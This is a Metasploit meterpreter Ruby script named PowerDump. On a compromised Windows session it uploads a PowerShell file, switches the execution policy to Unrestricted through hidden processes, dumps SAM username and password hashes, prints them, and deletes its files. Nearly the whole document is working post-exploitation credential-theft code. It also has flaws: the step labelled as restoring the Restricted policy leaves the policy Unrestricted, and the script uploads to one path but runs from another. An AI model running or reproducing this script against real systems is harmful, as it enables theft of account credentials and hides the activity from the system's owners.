Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
#
9
# Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
10
# keys. This script requires you to be running as system in order to work properly. This has currently been
11
# tested on Server 2008 and Windows 7, which install PowerShell by default.
12
#
13
# Script and code written by: Kathy Peters, Joshua Kelley (winfang), and David Kennedy (rel1k)
14
#
15
# Special thanks to Carlos Perez for the template from GetCounterMeasures.rb
16
#
17
# Script version 0.0.1
18
#
19

20
session = client
21
@@exec_opts = Rex::Parser::Arguments.new(
22
  "-h" => [ false, "Help menu." ]
23
)
24

25
def usage
26
  print_line("PowerDump -- Dumping the SAM database through PowerShell")
27
  print_line("Dump username and password hashes on systems that have")
28
  print_line("PowerShell installed on the system. Win7 and 2008 tested.")
29
  print(@@exec_opts.usage)
30
  raise Rex::Script::Completed
31
end
32

33
#-------------------------------------------------------------------------------
34
# Actual Hashdump here
35

36
def dumphash(session)
37

38
  path = File.join( Msf::Config.data_directory, "exploits", "powershell" )
39

40
  print_status("Running PowerDump to extract Username and Password Hashes...")
41
  filename=("#{rand(100000)}.ps1")
42
  hash_dump=("#{rand(100000)}")
43
  session.fs.file.upload_file("%TEMP%\\#{filename}","#{path}/powerdump.ps1")
44
  print_status("Uploaded PowerDump as #{filename} to %TEMP%...")
45
  opmode = ""
46
  print_status("Setting ExecutionPolicy to Unrestricted...")
47
  session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
48
  print_status("Dumping the SAM database through PowerShell...")
49
  session.sys.process.execute("powershell C:\\Windows\\Temp\\#{filename} >> C:\\Windows\\Temp\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
50
  sleep(10)
51
  hashes=session.fs.file.new("%TEMP%\\#{hash_dump}", "rb")
52
  begin
53
    while ((data = hashes.read) != nil)
54
      data=data.strip
55
      print_line(data)
56
    end
57
  rescue EOFError
58
  ensure
59
    hashes.close
60
  end
61
  print_status("Setting Execution policy back to Restricted...")
62
  session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
63
  print_status("Cleaning up after ourselves...")
64
  session.sys.process.execute("cmd /c del %TEMP%\\#{filename}", nil, {'Hidden' => 'true', 'Channelized' => true})
65
  session.sys.process.execute("cmd /c del %TEMP%\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
66

67
end
68
print_status("PowerDump v0.1 - PowerDump to extract Username and Password Hashes...")
69
dumphash(session)
70

71